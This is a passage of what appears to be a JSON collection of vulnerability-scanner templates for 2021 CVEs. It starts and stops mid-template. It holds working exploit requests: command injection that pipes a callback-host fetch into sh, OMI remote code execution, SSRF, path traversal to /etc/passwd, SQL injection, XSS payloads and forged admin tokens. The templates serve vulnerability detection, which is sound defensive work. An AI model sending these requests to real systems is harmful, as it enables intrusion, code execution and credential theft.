application/x-www-form-urlencoded\n\nsubmit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-27905","info":{"name":"Apache Solr <=8.8.1 - Server-Side Request Forgery","severity":"critical"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n","GET /solr/{{core}}/replication/?command=fetchindex&masterUrl=https://interact.sh HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n"],"matchers":[{"type":"word","part":"body","words":["<str name=\"status\">OK</str>"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2021-41878","info":{"name":"i-Panel Administration System 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22document.domain%22)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><img src=a onerror=alert(\"document.domain\")>","i-Panel Administration"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27850","info":{"name":"Apache Tapestry - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /assets/app/something/services/AppModule.class/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n","GET /assets/app/{{id}}/services/AppModule.class/ HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/java"]},{"type":"word","part":"body","words":["configuration","webtools"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["\\/assets\\/app\\/([a-z0-9]+)\\/services\\/AppMod"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-20837","info":{"name":"MovableType - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /cgi-bin/mt/mt-xmlrpc.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<methodCall>\n  <methodName>mt.handler_to_coderef</methodName>\n  <params>\n    <param>\n      <value>\n        <base64>\n          {{base64(\"`wget http://{{interactsh-url}}`\")}}\n        </base64>\n      </value>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","words":["failed loading package"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30497","info":{"name":"Ivanti Avalanche 6.3.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/AvalancheWeb/image?imageFilePath=C:/windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38647","info":{"name":"Microsoft Open Management Infrastructure - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /wsman HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/soap+xml;charset=UTF-8\n\n<s:Envelope\n  xmlns:s=\"http://www.w3.org/2003/05/soap-envelope\"\n  xmlns:a=\"http://schemas.xmlsoap.org/ws/2004/08/addressing\"\n  xmlns:n=\"http://schemas.xmlsoap.org/ws/2004/09/enumeration\"\n  xmlns:w=\"http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd\"\n  xmlns:xsi=\"http://www.w3.org/2001/XMLSchema\"\n  xmlns:h=\"http://schemas.microsoft.com/wbem/wsman/1/windows/shell\"\n  xmlns:p=\"http://schemas.microsoft.com/wbem/wsman/1/wsman.xsd\">\n  <s:Header>\n    <a:To>HTTP://{{Hostname}}/wsman/</a:To>\n    <w:ResourceURI s:mustUnderstand=\"true\">http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem</w:ResourceURI>\n    <a:ReplyTo>\n      <a:Address s:mustUnderstand=\"true\">http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>\n    </a:ReplyTo>\n    <a:Action>http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteScript</a:Action>\n    <w:MaxEnvelopeSize s:mustUnderstand=\"true\">102400</w:MaxEnvelopeSize>\n    <a:MessageID>uuid:00B60932-CC01-0005-0000-000000010000</a:MessageID>\n    <w:OperationTimeout>PT1M30S</w:OperationTimeout>\n    <w:Locale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n    <p:DataLocale xml:lang=\"en-us\" s:mustUnderstand=\"false\"/>\n    <w:OptionSet s:mustUnderstand=\"true\"/>\n    <w:SelectorSet>\n      <w:Selector Name=\"__cimnamespace\">root/scx</w:Selector>\n    </w:SelectorSet>\n  </s:Header>\n  <s:Body>\n    <p:ExecuteScript_INPUT\n      xmlns:p=\"http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem\">\n      <p:Script>aWQ=</p:Script>\n      <p:Arguments/>\n      <p:timeout>0</p:timeout>\n      <p:b64encoded>true</p:b64encoded>\n    </p:ExecuteScript_INPUT>\n  </s:Body>\n</s:Envelope>\n"],"matchers":[{"type":"word","words":["<p:StdOut>","uid=0(root) gid=0(root) groups=0"],"condition":"and"}]}]},{"id":"CVE-2021-21803","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35336","info":{"name":"Tieline IP Audio Gateway <=2.6.4.8 - Unauthorized Remote Admin Panel Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/get_device_details"],"headers":{"Authorization":"Digest username=\"admin\", realm=\"Bridge-IT\", nonce=\"d24d09512ebc3e43c4f6faf34fdb8c76\", uri=\"/api/get_device_details\", response=\"d052e9299debc7bd9cb8adef0a83fed4\", qop=auth, nc=00000001, cnonce=\"ae373d748855243d\"","Referer":"{{BaseURL}}/assets/base/home.html"},"matchers-condition":"and","matchers":[{"type":"word","words":["<SERIAL>","<VERSION>"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35323","info":{"name":"Bludit 3.13.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["GET /bludit/admin/login HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 10s\nPOST /bludit/admin/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntokenCSRF={{tokenCSRF}}&username=admin%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&password=pass&save=\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"<img src=x onerror=alert(document.domain)>\") && contains(body_2, \"Bludit\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"tokenCSRF","part":"body","group":1,"regex":["type=\"hidden\" id=\"jstokenCSRF\" name=\"tokenCSRF\" value=\"(.*)\""],"internal":true}]}]},{"id":"CVE-2021-40973","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[lastname]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41293","info":{"name":"ECOA Building Automation System - Arbitrary File Retrieval","severity":"high"},"requests":[{"raw":["POST /viewlog.jsp HTTP/1.1\nHost: {{Hostname}}\n\nyr=2021&mh=6&fname=../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24750","info":{"name":"WordPress Visitor Statistics (Real Time Traffic) <4.8 -SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22'%20union%20select%201,1,md5({{num}}),4--%20%22%7D HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28150","info":{"name":"Hongdian H8922 3.0.5 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /backup2.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic Z3Vlc3Q6Z3Vlc3Q=\n","GET /backup2.cgi HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46YWRtaW4=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"word","part":"body","words":["CLI configuration saved from vty","service webadmin"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21311","info":{"name":"Adminer <4.7.9 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["POST {{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nauth[driver]=elastic&auth[server]=example.org&auth[username]={{to_lower(rand_base(8))}}&auth[password]={{to_lower(rand_base(8))}}&auth[db]={{to_lower(rand_base(8))}}\n"],"payloads":{"path":["/index.php","/adminer.php","/adminer/adminer.php","/adminer/index.php","/_adminer.php","/_adminer/index.php"]},"attack":"batteringram","stop-at-first-match":true,"redirects":true,"max-redirects":1,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>400 - Bad Request</title>","&lt;title&gt;400 - Bad Request&lt;/title&gt;"],"condition":"or"},{"type":"status","status":[403]}]}]},{"id":"CVE-2021-40651","info":{"name":"OS4Ed OpenSIS Community 8.0 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUSERNAME={{username}}&PASSWORD={{password}}&language=en&log=\n","GET /Modules.php?modname=miscellaneous%2fPortal.php..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&failed_login= HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["regex('root:.*:0:0:', body)","contains(body_1, \"openSIS\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-21802","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?device_id=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20158","info":{"name":"Trendnet AC2600 TEW-827DRU 2.08B01 - Admin Password Change","severity":"critical"},"requests":[{"raw":["POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\nccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password={{password}}\n","POST /apply_sec.cgi HTTP/1.1\nHost: {{Hostname}}\n\nhtml_response_page=%2Flogin_pic.asp&login_name=YWRtaW4%3D&log_pass={{base64(password)}}&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["setConnectDevice","setInternet","setWlanSSID","TEW-827DRU"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27519","info":{"name":"FUDForum 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?SQ=0&srch=x\"+onmouseover%3Dalert%281%29+x%3D\"&t=search&btn_submit.x=0&btn_submit.y=0"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["highlightSearchTerms(\"x\" onmouseover=alert(1) x=\"\");"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46071","info":{"name":"ehicle Service Management System 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_category HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&category=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&status=1\n","GET /admin/?page=maintenance/category HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<td>\\\"><script>alert(document.domain)</script></td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-20031","info":{"name":"SonicWall SonicOS 7.0 - Open Redirect","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{randstr}}.tld\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["https://{{randstr}}.tld/auth.html","Please be patient as you are being re-directed"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41277","info":{"name":"Metabase - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/geojson?url=file:///etc/passwd","{{BaseURL}}/api/geojson?url=file:///c://windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0"]},{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2021-43778","info":{"name":"GLPI plugin Barcode < 2.6.1 - Path Traversal Vulnerability.","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44910","info":{"name":"SpringBlade - Information Leakage","severity":"high"},"requests":[{"raw":["GET /api/blade-user/user-list HTTP/1.1\nHost: {{Hostname}}\nBlade-Auth: bearer {{bearer}}\n"],"payloads":{"bearer":["eyJhbGciOiJIUzM4NCIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODIxNzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.gbUWSdFfmzfU_gKzFYjyyJzcrHBfOwswJvptowNwNwfo12QilWudTMg-LbDAOPwk","eyJhbGciOiJIUzM4NCIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODIxNzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.gbUWSdFfmzfU_gKzFYjyyJzcrHBfOwswJvptowNwNwfo12QilWudTMg-LbDAOPwk","eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODIxNzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.kol9scDVwLDE8U3mM_j8O4UYrpdUc9_Zw935g7Nb979DfRuanai1UeKsK2zCKuR77Otryi0sGzBfGANDbLseBg"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"success\":true","\"account\":","\"password\":"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36873","info":{"name":"WordPress iQ Block Country <=1.2.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=iqblockcountry-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Diq-block-country%2Flibs%2Fblockcountry-settings.php&blockcountry_blockmessage=test</textarea><script>alert(document.domain)</script>&blockcountry_redirect=2&blockcountry_redirect_url=&blockcountry_header=on&blockcountry_nrstatistics=15&blockcountry_daysstatistics=30&blockcountry_geoapikey=&blockcountry_apikey=&blockcountry_ipoverride=NONE&blockcountry_debuglogging=on\n","GET /wp-admin/options-general.php?page=iq-block-country%2Flibs%2Fblockcountry-settings.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_4, 'blockcountry_blockmessage\\\">test</textarea><script>alert(document.domain)</script>')","contains(body_4, '<h3>Block type</h3>')"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2021-3002","info":{"name":"Seo Panel 4.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /seo/seopanel/login.php?sec=forgot HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsec=requestpass&email=test%40test.com%22%3e%3cimg%20src%3da%20onerror%3dalert(document.domain)%3e11&code=AAAAA&login=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<img src=a onerror=alert(document.domain)>","seopanel"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24666","info":{"name":"WordPress Podlove Podcast Publisher <3.5.6 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["66a82937a7660b73b00d4f7cefee6c85","\"service_id\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24926","info":{"name":"WordPress Domain Check <1.0.17 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=domain-check-profile&domain=test.foo<script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Domain Check"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41381","info":{"name":"Payara Micro Community 5.2021.6 Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.//WEB-INF/classes/META-INF/microprofile-config.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["payara.security.openid.default.providerURI=","payara.security.openid.sessionScopedConfiguration=true"],"condition":"and"}]}]},{"id":"CVE-2021-38147","info":{"name":"Wipro Holmes Orchestrator 20.4.1 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/processexecution/DownloadExcelFile/Domain_Credential_Report_Excel","{{BaseURL}}/processexecution/DownloadExcelFile/Process_Report_Excel","{{BaseURL}}/processexecution/DownloadExcelFile/Infrastructure_Report_Excel","{{BaseURL}}/processexecution/DownloadExcelFile/Resolver_Report_Excel"],"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains_all(header, 'application/vnd.openxml', 'attachment; filename=')","contains(body, '<?xml version=')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-41951","info":{"name":"Resourcespace - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/wordpress_sso/pages/index.php?wordpress_user=%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["TEST<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31250","info":{"name":"CHIYU TCP/IP Converter - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28{{randstr}}%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY"],"headers":{"Authorization":"Basic OmFkbWlu"},"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["\"><script>alert({{randstr}})</script>"]}]}]},{"id":"CVE-2021-33690","info":{"name":"SAP NetWeaver Development Infrastructure - Server Side Request Forgery","severity":"critical"},"requests":[{"raw":["POST /tc.CBS.Appl/tcspseudo HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nCBS=http://{{interactsh-url}}&USER=1&PWD=1&REQ_CONFIRM_DELAY=2000&ACTION=CONFIGURE\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["Could not connect to the CBS"]}]}]},{"id":"CVE-2021-22707","info":{"name":"EVlink City < R8 V3.4.0.1 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/cgiServer?worker=IndexNew HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nCookie: CURLTOKEN=b35fcdc1ea1221e6dd126e172a0131c5a; SESSIONID=admin\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","words":["?worker=Cluster\" name=\"cluster\" id=\"id_cluster"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26710","info":{"name":"Redwood Report2Web 4.3.4.5 & 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32853","info":{"name":"Erxes <0.23.0 - Cross-Site Scripting","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["topic_id: \"</script><script>alert(document.domain)</script>","window.erxesEnv"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27316","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname={{randstr}}&lastname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-38702","info":{"name":"Cyberoam NetGenie Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41649","info":{"name":"PuneethReddyHC Online Shopping System homeaction.php SQL Injection","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/homeaction.php"],"body":"cat_id=4'&get_seleted_Category=1","matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["Warning: mysqli_num_rows() expects parameter 1 to be","xdebug-error xe-warning"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45092","info":{"name":"Thinfinity Iframe Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/lab.html?vpath=//interact.sh"],"matchers":[{"type":"regex","regex":[".*vpath.*","thinfinity"],"condition":"and"}]}]},{"id":"CVE-2021-43287","info":{"name":"Pre-Auth Takeover of Build Pipelines in GoCD","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24910","info":{"name":"WordPress Transposh Translation <1.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=tp_tp&e=g&m=s&tl=en&q=<img%20src%3dx%20onerror%3dalert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src=x onerror=alert(document.domain)>","{\"result\":"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27132","info":{"name":"Sercomm VD625 Smart Modems - CRLF Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/test.txt%0d%0aSet-Cookie:CRLFInjection=Test%0d%0aLocation:%20interact.sh%0d%0aX-XSS-Protection:0"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Content-Disposition: attachment;filename=test.txt","Set-Cookie:CRLFInjection=Test","Location: interact.sh","X-XSS-Protection:0"],"condition":"and"},{"type":"status","part":"header","status":[404]}]}]},{"id":"CVE-2021-22502","info":{"name":"Micro Focus Operations Bridge Reporter - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /AdminService/urest/v1/LogonResource HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"userName\":\"something `wget 